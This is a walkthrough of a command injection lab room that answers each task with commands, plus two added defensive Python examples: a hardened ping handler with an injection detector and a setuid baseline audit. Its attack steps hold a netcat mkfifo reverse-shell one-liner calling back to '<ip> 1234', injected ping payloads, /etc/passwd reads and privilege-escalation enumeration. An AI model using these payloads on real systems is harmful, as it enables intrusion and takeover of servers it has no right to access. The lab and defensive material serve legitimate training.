[Task 3] Blind Command Injection
1. Ping the box with 10 packets. What is this command (without IP address)?
Access the site.
Prepare the attacker machine to capture the incoming ICMP echo requests from the ping command:
tcpdump ip proto \\icmp -i tun0
; ping -c 10 <attacker ip>
Back on the attacker machine: success!!!
2. Redirect the box’s Linux Kernel Version to a file on the web server. What is the Linux Kernel Version?
I will get the reverse shell.
Prepare listener
nc -lvp 1234
Reverse shell reference:
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1234 >/tmp/f
Paste the command and submit.
Back on the listener, now I have a shell:
uname -a
3. Enter “root” into the input and review the alert. What type of alert do you get?
4. Enter “www-data” into the input and review the alert. What type of alert do you get?
5. Enter your name into the input and review the alert. What type of alert do you get?
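The blind injection in Task 3 works because the site glues the submitted address into a shell string. The following is an added example, not code from the original write-up or from the room's own application: the same ping feature written the vulnerable way next to a hardened version that validates the target and passes it as a single argv element, plus a small check that flags the shell metacharacters used above when reviewing request logs. The function names and the sample request values are constructed for illustration.

```python
"""Vulnerable vs. hardened ping handler, plus a metacharacter check for logs."""
import ipaddress
import re
import subprocess


def vulnerable_ping_command(user_input: str) -> str:
    # The pattern behind Task 3: user input is concatenated into a string
    # that would be handed to /bin/sh. Returned, not executed, so the
    # example is safe to run; note the injected ";" survives untouched.
    return "ping -c 1 " + user_input


def is_valid_target(user_input: str) -> bool:
    # Accept only a syntactically valid IPv4/IPv6 address. Hostnames with
    # separators, "; ...", pipes and backticks all fail this check.
    try:
        ipaddress.ip_address(user_input.strip())
        return True
    except ValueError:
        return False


def hardened_ping_argv(user_input: str) -> list:
    # argv list with shell=False: the target is one argument to ping and
    # is never re-parsed by a shell, and it has already been validated.
    if not is_valid_target(user_input):
        raise ValueError(f"rejected target: {user_input!r}")
    return ["ping", "-c", "1", str(ipaddress.ip_address(user_input.strip()))]


def run_hardened_ping(user_input: str) -> subprocess.CompletedProcess:
    # Hypothetical request handler body: no shell involved at any point.
    return subprocess.run(hardened_ping_argv(user_input),
                          capture_output=True, text=True, timeout=15)


# Characters that let one command become two when a shell parses the input.
INJECTION_PATTERN = re.compile(r"[;&|`$(){}<>]|\n")


def looks_like_injection(value: str) -> bool:
    return bool(INJECTION_PATTERN.search(value))


# Constructed sample of values submitted to the ping form (not real traffic).
SAMPLE_REQUESTS = [
    "10.10.10.10",
    "10.10.10.10; ping -c 10 10.8.0.1",
    "8.8.8.8 | id",
]


def flag_suspicious(requests) -> list:
    # Detection-side view: which submitted values deserve a closer look.
    return [r for r in requests if looks_like_injection(r)]


if __name__ == "__main__":
    print(vulnerable_ping_command(SAMPLE_REQUESTS[1]))
    print(hardened_ping_argv(SAMPLE_REQUESTS[0]))
    print(flag_suspicious(SAMPLE_REQUESTS))
```

The validation is the real fix; the metacharacter regex is only a review aid for logs and would miss encodings the application decodes later, so it should not be used as the sole control.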
[Task 4] Active Command Injection
1. What strange text file is in the website root directory?
ls
cat drpepper.txt
2. How many non-root/non-service/non-daemon users are there?
cat /etc/passwd
The answer is zero.
3. What user is this app running as?
whoami
4. What is the user’s shell set as?
See the /etc/passwd output from #2; the last field of the user's line is the login shell.
5. What version of Ubuntu is running?
lsb_release -a
6. Print out the MOTD. What favorite beverage is shown?
cat /etc/update-motd.d/00-header
[Task 5] Get The Flag!
1. Get the flag!
Upgrade to a TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
Sudo
sudo -l
SUID
find / -perm -u=s -type f 2>/dev/null
Cronjob
cat /etc/crontab
Capabilities
getcap -r / 2>/dev/null
After all of these, I'm hitting a wall. Looking at the hint may help.
No privesc!!! Maybe there's a hidden flag.
find / 2>/dev/null | grep -i "flag"
Lucky me!!!
cat /etc/flag.txt
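The SUID sweep in Task 5 (`find / -perm -u=s -type f 2>/dev/null`) is just as useful on the defending side, where the question is not "which of these can I abuse" but "which of these were not here yesterday". The following is an added example, not code from the original write-up: the same sweep as a Python function, compared against an approved baseline so that a binary that newly gained the setuid bit stands out. `demo_on_tempdir()` builds a throwaway directory with constructed files so the audit can run without touching the real filesystem; all names in it are made up.

```python
"""Baseline comparison for setuid files, the defender's version of the Task 5 sweep."""
import os
import stat
import tempfile


def find_suid(root: str) -> list:
    # Equivalent of `find ROOT -perm -u=s -type f 2>/dev/null`: walk the
    # tree, keep regular files whose mode has S_ISUID set, and skip paths
    # that cannot be read instead of aborting.
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(root: str, baseline: set) -> list:
    # Anything setuid that is not in the approved baseline is worth a look:
    # a freshly planted setuid shell or a package upgrade you did not expect.
    return [p for p in find_suid(root) if p not in baseline]


def demo_on_tempdir() -> tuple:
    # Constructed fixture: one approved setuid file, one rogue setuid file,
    # one plain executable. Returns paths relative to the temp root.
    with tempfile.TemporaryDirectory() as tmp:
        approved = os.path.join(tmp, "bin", "approved-suid")
        rogue = os.path.join(tmp, "tmp", "rogue-suid")
        plain = os.path.join(tmp, "bin", "plain")
        for path in (approved, rogue, plain):
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(approved, 0o4755)
        os.chmod(rogue, 0o4755)
        os.chmod(plain, 0o755)
        found = [os.path.relpath(p, tmp) for p in find_suid(tmp)]
        rogue_only = [os.path.relpath(p, tmp)
                      for p in unexpected_suid(tmp, {approved})]
        return found, rogue_only


if __name__ == "__main__":
    found, rogue_only = demo_on_tempdir()
    print("setuid files:", found)
    print("not in baseline:", rogue_only)
```

On a real host the baseline would be the list recorded at build time (or taken from the package manager's file lists), and the audit would run from cron or a configuration-management check so that a new entry raises an alert rather than waiting for someone to run `find` by hand.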